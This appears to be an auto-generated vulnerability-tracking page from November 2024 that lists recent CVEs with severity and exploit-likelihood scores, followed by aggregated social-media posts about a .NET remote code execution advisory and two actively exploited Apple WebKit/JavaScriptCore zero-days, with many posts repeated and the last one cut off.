## Updated at UTC 2024-11-20T21:13:16.729485

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2024-43498 9.8 0.14% 1 0 2024-11-20T18:56:28 # Microsoft Security Advisory CVE-2024-43498 | .NET Remote Code Execution Vulner
CVE-2024-44308 8.8 0.04% 30 0 2024-11-20T18:33:20 The issue was addressed with improved checks. This issue is fixed in Safari 18.1
CVE-2024-44625 8.8 4.35% 1 1 2024-11-20T16:44:13 Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function
CVE-2024-10924 9.8 0.04% 3 7 2024-11-20T15:30:50 The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress
CVE-2024-11395 8.8 0.04% 5 0 2024-11-20T00:32:14 Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote at
CVE-2024-44309 0 0.04% 28 0 2024-11-20T00:15:17.137000 A cookie management issue was addressed with improved state management. This iss
CVE-2024-43450 7.5 0.13% 1 0 2024-11-19T20:49:26.017000 Windows DNS Spoofing Vulnerability
CVE-2024-0793 7.7 0.12% 4 0 2024-11-19T20:25:31 A flaw was found in kube-controller-manager. This issue occurs when the initial
CVE-2024-21287 7.5 0.09% 7 0 2024-11-19T18:31:00 Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (
CVE-2024-52867 8.2 0.04% 4 0 2024-11-19T18:30:58 guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build
CVE-2024-0012 9.8 96.61% 57 4 template 2024-11-19T17:17:29.723000 An authentication bypass in Palo Alto Networks PAN-OS software enables an unauth
CVE-2024-9474 7.2 97.40% 51 3 template 2024-11-19T17:16:40.513000 A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allow
CVE-2024-11159 4.3 0.05% 2 0 2024-11-19T14:56:37.800000 Using remote content in OpenPGP encrypted messages can lead to the disclosure of
CVE-2024-48510 9.8 0.06% 3 0 2024-11-18T23:41:15 Directory Traversal vulnerability in DotNetZip v.1.16.0 and before allows a remo
CVE-2024-49019 7.8 0.05% 3 0 2024-11-18T21:12:46.067000 Active Directory Certificate Services Elevation of Privilege Vulnerability
CVE-2024-52940 7.5 0.04% 1 1 2024-11-18T18:32:00 AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inad
CVE-2023-0657 3.4 0.04% 4 0 2024-11-18T17:11:17.393000 A flaw was found in Keycloak. This issue occurs due to improperly enforcing toke
CVE-2023-1419 5.9 0.09% 4 0 2024-11-18T17:11:17.393000 A script injection vulnerability was found in the Debezium database connector, w
CVE-2023-4639 7.4 0.10% 4 0 2024-11-18T17:11:17.393000 A flaw was found in Undertow, which incorrectly parses cookies with certain valu
CVE-2023-6110 5.5 0.08% 4 0 2024-11-18T17:11:17.393000 A flaw was found in OpenStack. When a user tries to delete a non-existing access
CVE-2023-43091 9.8 0.04% 4 0 2024-11-17T15:30:52 A flaw was found in GNOME Maps, which is vulnerable to a code injection attack v
CVE-2020-25720 7.5 0.05% 4 0 2024-11-17T12:30:36 A vulnerability was found in Samba where a delegated administrator with permissi
CVE-2024-49060 8.8 0.04% 2 0 2024-11-15T21:30:53 Azure Stack HCI Elevation of Privilege Vulnerability
CVE-2024-50986 None 0.04% 1 1 2024-11-15T15:31:04 An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code
CVE-2024-9465 9.1 94.95% 10 2 template 2024-11-15T14:39:34.863000 An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauth
CVE-2024-7404 6.8 0.04% 1 0 2024-11-15T13:58:08.913000 An issue was discovered in GitLab CE/EE affecting all versions starting from 17.
CVE-2024-9463 7.5 96.23% 9 0 template 2024-11-15T02:00:01.687000 An OS command injection vulnerability in Palo Alto Networks Expedition allows an
CVE-2024-52551 8.0 0.04% 1 0 2024-11-14T22:45:14 Jenkins Pipeline: Declarative Plugin 2.2214.vb_b_34b_2ea_9b_83 and earlier does
CVE-2024-52552 8.0 0.04% 1 0 2024-11-14T22:45:13 Jenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing
CVE-2024-49025 5.4 0.05% 4 0 2024-11-14T21:32:11 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability
CVE-2024-36513 8.8 0.04% 1 0 2024-11-14T20:35:26.093000 A privilege context switching error vulnerability [CWE-270] in FortiClient Windo
CVE-2024-36509 4.4 0.04% 1 0 2024-11-14T20:33:44.727000 An exposure of sensitive system information to an unauthorized control sphere vu
CVE-2024-8068 None 0.04% 3 0 2024-11-14T18:30:34 Privilege escalation to NetworkService Account access in Citrix Session Recordin
CVE-2024-50252 5.5 0.04% 1 0 2024-11-14T18:08:17.857000 In the Linux kernel, the following vulnerability has been resolved: mlxsw: spec
CVE-2024-52554 8.8 0.04% 1 0 2024-11-14T15:42:42 Jenkins Shared Library Version Override Plugin 17.v786074c9fce7 and earlier decl
CVE-2024-52550 8.0 0.04% 1 0 2024-11-14T15:41:49 Jenkins Pipeline: Groovy Plugin 3990.vd281dd77a_388 and earlier, except 3975.397
CVE-2024-52553 8.8 0.04% 1 0 2024-11-14T15:37:53 Jenkins OpenId Connect Authentication Plugin 4.418.vccc7061f5b_6d and earlier do
CVE-2024-52549 4.3 0.04% 1 0 2024-11-14T15:35:55 Jenkins Script Security Plugin 1367.vdf2fc45f229c and earlier, except 1365.1367.
CVE-2024-8648 6.1 0.04% 1 0 2024-11-14T15:32:16 An issue has been discovered in GitLab CE/EE affecting all versions from 16 befo
CVE-2024-5917 None 0.04% 1 1 2024-11-14T12:31:09 A server-side request forgery in PAN-OS software enables an unauthenticated atta
CVE-2024-9472 None 0.04% 1 1 2024-11-14T12:31:08 A null pointer dereference in Palo Alto Networks PAN-OS software on PA-800 Serie
CVE-2024-2552 None 0.04% 1 1 2024-11-14T12:31:08 A command injection vulnerability in Palo Alto Networks PAN-OS software enables
CVE-2024-5920 None 0.04% 1 0 2024-11-14T12:31:02 A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software
CVE-2024-5918 None 0.04% 1 0 2024-11-14T12:31:02 An improper certificate validation vulnerability in Palo Alto Networks PAN-OS so
CVE-2024-5919 None 0.04% 1 1 2024-11-14T12:31:02 A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Net
CVE-2024-8180 5.4 0.04% 1 0 2024-11-14T12:31:02 An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 be
CVE-2024-9693 8.6 0.04% 1 0 2024-11-14T12:31:02 An issue was discovered in GitLab CE/EE affecting all versions starting from 16.
CVE-2024-2550 None 0.04% 1 1 2024-11-14T12:31:01 A null pointer dereference vulnerability in the GlobalProtect gateway in Palo Al
CVE-2024-2551 None 0.04% 1 1 2024-11-14T12:31:01 A null pointer dereference vulnerability in Palo Alto Networks PAN-OS software e
CVE-2024-8535 8.8 0.04% 1 0 2024-11-14T00:31:11 Authenticated user can access unintended user capabilities in NetScaler ADC and
CVE-2024-43093 7.8 0.25% 3 2 2024-11-13T21:31:39 In shouldHideDocument of ExternalStorageProvider.java, there is a possible bypas
CVE-2024-8534 5.3 0.04% 1 0 2024-11-13T21:30:33 Memory safety vulnerability leading to memory corruption and Denial of Service i
CVE-2024-11116 4.3 0.04% 1 0 2024-11-13T18:33:06 Inappropriate implementation in Blink in Google Chrome prior to 131.0.6778.69 al
CVE-2024-11110 6.5 0.04% 2 0 2024-11-13T18:33:05 Inappropriate implementation in Extensions in Google Chrome prior to 131.0.6778.
CVE-2024-11115 8.8 0.04% 1 0 2024-11-13T18:33:05 Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 1
CVE-2024-11111 4.3 0.04% 1 0 2024-11-13T18:33:05 Inappropriate implementation in Autofill in Google Chrome prior to 131.0.6778.69
CVE-2024-11117 4.3 0.04% 2 0 2024-11-13T18:31:59 Inappropriate implementation in FileSystem in Google Chrome prior to 131.0.6778.
CVE-2024-8069 8.8 0.04% 3 0 2024-11-13T18:31:59 Limited remote code execution with privilege of a NetworkService Account access 
CVE-2014-2120 5.4 0.25% 2 0 2024-11-13T18:31:52 Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adapt
CVE-2024-33505 5.6 0.04% 1 0 2024-11-13T17:01:16.850000 A heap-based buffer overflow in Fortinet FortiAnalyzer version 7.4.0 through 7.4
CVE-2023-50176 7.5 0.04% 1 0 2024-11-13T17:01:16.850000 A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 thr
CVE-2023-47543 5.4 0.04% 1 0 2024-11-13T17:01:16.850000 An authorization bypass through user-controlled key vulnerability [CWE-639] in F
CVE-2024-47574 7.8 0.04% 2 0 2024-11-13T12:32:16 A authentication bypass using an alternate path or channel in Fortinet FortiClie
CVE-2024-11114 8.4 0.04% 1 0 2024-11-13T00:30:48 Inappropriate implementation in Views in Google Chrome on Windows prior to 131.0
CVE-2024-11113 8.8 0.04% 1 0 2024-11-13T00:30:48 Use after free in Accessibility in Google Chrome prior to 131.0.6778.69 allowed
CVE-2024-11112 7.5 0.04% 1 0 2024-11-13T00:30:48 Use after free in Media in Google Chrome on Windows prior to 131.0.6778.69 allow
CVE-2024-32117 4.9 0.04% 1 0 2024-11-12T21:31:01 An improper limitation of a pathname to a restricted directory ('Path Traversal'
CVE-2024-26011 5.3 0.04% 1 0 2024-11-12T21:31:01 A missing authentication for critical function in Fortinet FortiManager version
CVE-2024-40592 7.6 0.04% 1 0 2024-11-12T21:31:01 An improper verification of cryptographic signature vulnerability [CWE-347] in F
CVE-2024-23666 7.5 0.04% 1 0 2024-11-12T21:30:54 A client-side enforcement of server-side security in Fortinet FortiAnalyzer-BigD
CVE-2024-36507 7.3 0.05% 1 0 2024-11-12T21:30:53 A untrusted search path in Fortinet FortiClientWindows versions 7.4.0, versions
CVE-2024-31496 6.7 0.04% 1 0 2024-11-12T21:30:52 A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiManager v
CVE-2024-33510 4.3 0.04% 1 0 2024-11-12T21:30:52 An improper neutralization of special elements in output used by a downstream co
CVE-2024-32118 6.7 0.04% 1 0 2024-11-12T21:30:52 Multiple improper neutralization of special elements used in an OS command ('OS
CVE-2024-32116 5.1 0.04% 1 0 2024-11-12T21:30:52 Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiManag
CVE-2023-44255 4.1 0.04% 1 0 2024-11-12T21:30:52 An exposure of sensitive information to an unauthorized actor [CWE-200] in Forti
CVE-2024-35274 2.3 0.04% 1 0 2024-11-12T21:30:52 An improper limitation of a pathname to a restricted directory ('Path Traversal'
CVE-2024-43602 10.0 0.05% 1 0 2024-11-12T18:31:06 Azure CycleCloud Remote Code Execution Vulnerability
CVE-2024-43451 6.5 0.47% 19 0 2024-11-12T18:31:05 NTLM Hash Disclosure Spoofing Vulnerability
CVE-2024-49040 7.5 0.09% 4 0 2024-11-12T18:31:00 Microsoft Exchange Server Spoofing Vulnerability
CVE-2024-49039 8.8 1.23% 7 1 2024-11-12T18:31:00 Windows Task Scheduler Elevation of Privilege Vulnerability
CVE-2024-43639 9.8 0.14% 3 0 2024-11-12T18:30:59 Windows Kerberos Remote Code Execution Vulnerability
CVE-2024-51567 10.0 40.13% 3 2 2024-11-08T21:34:54 upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before
CVE-2024-5910 9.8 97.10% 9 1 template 2024-11-08T21:33:52 Missing authentication for a critical function in Palo Alto Networks Expedition
CVE-2024-40715 7.7 0.07% 1 0 2024-11-08T19:01:03.880000 A vulnerability in Veeam Backup & Replication Enterprise Manager has been identi
CVE-2020-11921 8.8 0.04% 1 0 2024-11-08T18:31:57 An issue was discovered in Lush 2 through 2020-02-25. Due to the lack of Bluetoo
CVE-2024-51998 8.6 0.04% 1 0 2024-11-08T13:55:32 ### Summary The validation for the file URI scheme falls short, and results in
CVE-2024-51987 5.4 0.04% 1 1 2024-11-08T13:55:27 ### Impact HTTP Clients created by `AddUserAccessTokenHttpClient` may use a diff
CVE-2024-47072 7.5 0.04% 1 0 2024-11-08T13:55:23 ### Impact The vulnerability may allow a remote attacker to terminate the applic
CVE-2024-50340 7.3 0.05% 1 1 template 2024-11-06T23:39:52 ### Description When the `register_argc_argv` php directive is set to `on` , an
CVE-2024-20484 7.5 0.04% 1 1 2024-11-06T18:31:17 A vulnerability in the External Agent Assignment Service (EAAS) feature of Cisco
CVE-2024-20536 8.8 0.04% 1 0 2024-11-06T18:31:17 A vulnerability in a REST API endpoint and web-based management interface of Cis
CVE-2024-10826 8.8 0.04% 1 0 2024-11-06T18:31:17 Use after free in Family Experiences in Google Chrome on Android prior to 130.0.
CVE-2024-10827 8.8 0.04% 1 0 2024-11-06T18:31:17 Use after free in Serial in Google Chrome prior to 130.0.6723.116 allowed a remo
CVE-2024-42509 9.8 0.04% 3 0 2024-11-06T18:17:17.287000 Command injection vulnerability in the underlying CLI service could lead to unau
CVE-2024-47460 9.0 0.04% 1 0 2024-11-06T18:17:17.287000 Command injection vulnerability in the underlying CLI service could lead to unau
CVE-2024-20418 10.0 0.04% 1 0 2024-11-06T18:17:17.287000 A vulnerability in the web-based management interface of Cisco Unified Industria
CVE-2024-10914 8.1 16.93% 6 5 template 2024-11-06T15:30:46 A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up
CVE-2024-49767 7.5 0.06% 1 1 2024-11-05T21:35:24 Applications using Werkzeug to parse `multipart/form-data` requests are vulnerab
CVE-2024-8934 6.5 0.04% 1 0 2024-10-31T15:31:04 A local user with administrative access rights can enter specialy crafted values
CVE-2024-44252 7.1 0.04% 1 1 2024-10-30T18:30:48 A logic issue was addressed with improved file handling. This issue is fixed in
CVE-2024-38821 9.1 0.04% 1 1 2024-10-28T17:59:30 Spring WebFlux applications that have Spring Security authorization rules on sta
CVE-2024-49766 None 0.04% 1 1 2024-10-26T03:47:04 On Python < 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `//
CVE-2024-47575 9.8 5.18% 9 8 2024-10-23T15:31:52 A missing authentication for critical function in FortiManager 7.6.0, FortiManag
CVE-2024-21216 9.8 0.15% 2 1 2024-10-17T15:31:09 Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware
CVE-2024-4131 7.8 0.04% 1 1 2024-10-11T18:32:57 A DLL hijack vulnerability was reported in Lenovo Emulator that could allow a lo
CVE-2024-43601 7.1 0.05% 1 1 2024-10-08T18:33:29 Visual Studio Code for Linux Remote Code Execution Vulnerability
CVE-2024-38813 7.5 0.09% 19 0 2024-10-02T15:31:39 The vCenter Server contains a privilege escalation vulnerability. A malicious ac
CVE-2024-38812 9.8 0.09% 19 1 2024-10-02T15:30:37 The vCenter Server contains a heap-overflow vulnerability in the implementation
CVE-2022-46751 8.2 0.15% 1 0 2024-09-30T13:35:28 Improper Restriction of XML External Entity Reference, XML Injection (aka Blind
CVE-2024-47062 8.8 0.05% 1 1 template 2024-09-20T22:07:52 # Security Advisory: Multiple Vulnerabilities in Navidrome ## Summary Navidrom
CVE-2024-45409 10.0 16.41% 1 1 template 2024-09-16T15:29:27 Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature
CVE-2024-40711 9.8 96.69% 1 2 template 2024-09-09T18:30:30 A deserialization of untrusted data vulnerability with a malicious payload can a
CVE-2024-42057 8.1 0.09% 2 0 2024-09-03T03:30:40 A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series f
CVE-2024-39717 6.6 0.21% 2 0 2024-08-27T18:31:36 The Versa Director GUI provides an option to customize the look and feel of the
CVE-2024-5034 8.8 0.04% 1 1 2024-08-01T15:33:03 The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places
CVE-2017-0199 7.8 97.50% 1 26 2024-07-24T17:11:35.740000 Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1,
CVE-2024-38094 7.2 4.64% 1 0 2024-07-09T18:31:01 Microsoft SharePoint Remote Code Execution Vulnerability
CVE-2024-4577 9.8 96.32% 1 54 template 2024-06-21T21:35:02 In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, wh
CVE-2024-35250 7.8 0.04% 2 1 2024-06-20T18:35:10 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-30103 8.8 0.09% 1 0 2024-06-11T18:30:56 Microsoft Outlook Remote Code Execution Vulnerability
CVE-2024-30051 7.8 0.08% 1 1 2024-05-16T20:27:22.830000 Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-4351 8.8 0.05% 1 1 2024-05-16T12:30:29 The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of d
CVE-2024-3400 9.8 96.41% 1 1 template 2024-04-29T05:02:31 A command injection vulnerability in the GlobalProtect feature of Palo Alto Netw
CVE-2023-27944 8.6 0.06% 1 0 2024-04-11T21:19:47 This issue was addressed with a new entitlement. This issue is fixed in macOS Ve
CVE-2024-26229 7.8 0.04% 2 6 2024-04-09T18:30:35 Windows CSC Service Elevation of Privilege Vulnerability
CVE-2023-3519 9.8 96.55% 1 15 2024-04-04T06:17:12 Unauthenticated remote code execution
CVE-2023-32414 8.6 0.05% 1 0 2024-04-04T05:08:19 The issue was addressed with improved checks. This issue is fixed in macOS Ventu
CVE-2023-27997 9.8 9.72% 2 9 2024-04-04T04:45:33 A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an
CVE-2024-20767 8.2 11.07% 2 1 2024-03-18T12:31:54 ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Acce
CVE-2023-36328 9.8 0.16% 1 0 2024-03-07T18:30:26 Integer Overflow vulnerability in mp_grow in libtom libtommath before commit beb
CVE-2023-4911 7.8 17.23% 1 16 template 2024-03-02T05:06:50 A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi
CVE-2024-1212 10.0 91.88% 4 1 template 2024-02-21T18:31:06 Unauthenticated remote attackers can access the system through the LoadMaster ma
CVE-2024-23113 9.8 1.84% 5 8 2024-02-15T15:30:37 A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0
CVE-2023-20198 10.0 88.58% 2 30 template 2024-02-03T05:07:29 Cisco is aware of active exploitation of a previously unknown vulnerability in t
CVE-2023-20273 7.2 7.47% 2 3 2024-02-03T05:06:23 A vulnerability in the web UI feature of Cisco IOS XE Software could allow an au
CVE-2020-3259 7.5 2.71% 1 0 2023-08-16T18:30:19 A vulnerability in the web services interface of Cisco Adaptive Security Applian
CVE-2021-40539 9.8 97.47% 2 5 template 2023-08-08T15:31:21 Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to RES
CVE-2021-4043 5.5 0.09% 1 9 2023-06-05T05:00:42 NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0.
CVE-2019-16278 9.8 97.42% 3 15 template 2023-03-23T18:30:31 Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6
CVE-2022-42475 9.8 27.42% 2 7 2023-02-02T05:01:14 A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th
CVE-2021-27860 8.8 28.52% 2 0 2023-02-01T05:06:42 A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVP
CVE-2021-26086 5.3 97.11% 2 2 2023-01-30T05:01:33 Affected versions of Atlassian Jira Server and Data Center allow remote attacker
CVE-2019-12900 9.8 1.96% 1 0 2023-01-27T05:02:50 BZ2_decompress in decompress.c in bzip2 through 1.0.6 has an out-of-bounds write
CVE-2020-12271 9.8 1.67% 1 1 2023-01-27T05:02:29 A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-0
CVE-2024-11394 0 0.00% 2 1 N/A
CVE-2024-11393 0 0.00% 2 1 N/A
CVE-2024-31449 0 0.04% 1 0 N/A
CVE-2024-40590 0 0.00% 1 0 N/A
CVE-2024-10240 0 0.00% 1 0 N/A
CVE-2021-41277 0 97.29% 2 13 template N/A
CVE-2024-45819 0 0.00% 1 0 N/A
CVE-2024-27864 0 0.00% 1 0 N/A

CVE-2024-43498
(9.8 CRITICAL)

EPSS: 0.14%

updated 2024-11-20T18:56:28

1 posts

# Microsoft Security Advisory CVE-2024-43498 | .NET Remote Code Execution Vulnerability ## <a name="executive-summary"></a>Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 9.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote unauthenticated attac

mttaggart@infosec.exchange at 2024-11-12T18:54:56.000Z ##

Some fairly interesting stuff for this #PatchTuesday!

Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.

zerodayinitiative.com/blog/202

##

CVE-2024-44308
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-20T18:33:20

30 posts

The issue was addressed with improved checks. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

kristian@social.purrucker.de at 2024-11-19T21:42:09.000Z ##

Oha. Eigentlich hätte ich mit iOS 18.2 von Apple gerechnet. Anstelle schieben die jetzt 18.1.1 mit einem super wichtigen Sicherheitsupdate (CVE-2024-44308) raus, dass ein von Google entdecktes zeroday im WebKit fixen soll.

#Apple #ios #sicherheitsupdate #webkit #CVE202444308

support.apple.com/en-us/121752

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

threatcodex at 2024-11-20T17:27:16.977Z ##

Update now! Apple confirms vulnerabilities are already being exploited

malwarebytes.com/blog/news/202

##

screaminggoat at 2024-11-19T18:58:41.227Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

##

screaminggoat@infosec.exchange at 2024-11-19T18:58:41.000Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309

##

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

kristian@social.purrucker.de at 2024-11-19T21:42:09.000Z ##

Oha. Eigentlich hätte ich mit iOS 18.2 von Apple gerechnet. Anstelle schieben die jetzt 18.1.1 mit einem super wichtigen Sicherheitsupdate (CVE-2024-44308) raus, dass ein von Google entdecktes zeroday im WebKit fixen soll.

#Apple #ios #sicherheitsupdate #webkit #CVE202444308

support.apple.com/en-us/121752

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

threatcodex at 2024-11-20T17:27:16.977Z ##

Update now! Apple confirms vulnerabilities are already being exploited

malwarebytes.com/blog/news/202

##

screaminggoat at 2024-11-19T18:58:41.227Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

##

screaminggoat@infosec.exchange at 2024-11-19T18:58:41.000Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309

##

AAKL at 2024-11-20T14:32:04.784Z ##

If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.

Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec at 2024-11-19T22:04:28.058Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

##

applsec at 2024-11-19T19:45:33.314Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

##

applsec at 2024-11-19T18:47:56.429Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

##

AAKL@infosec.exchange at 2024-11-20T14:32:04.000Z ##

If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.

#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news #cybersecurity #infosec

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

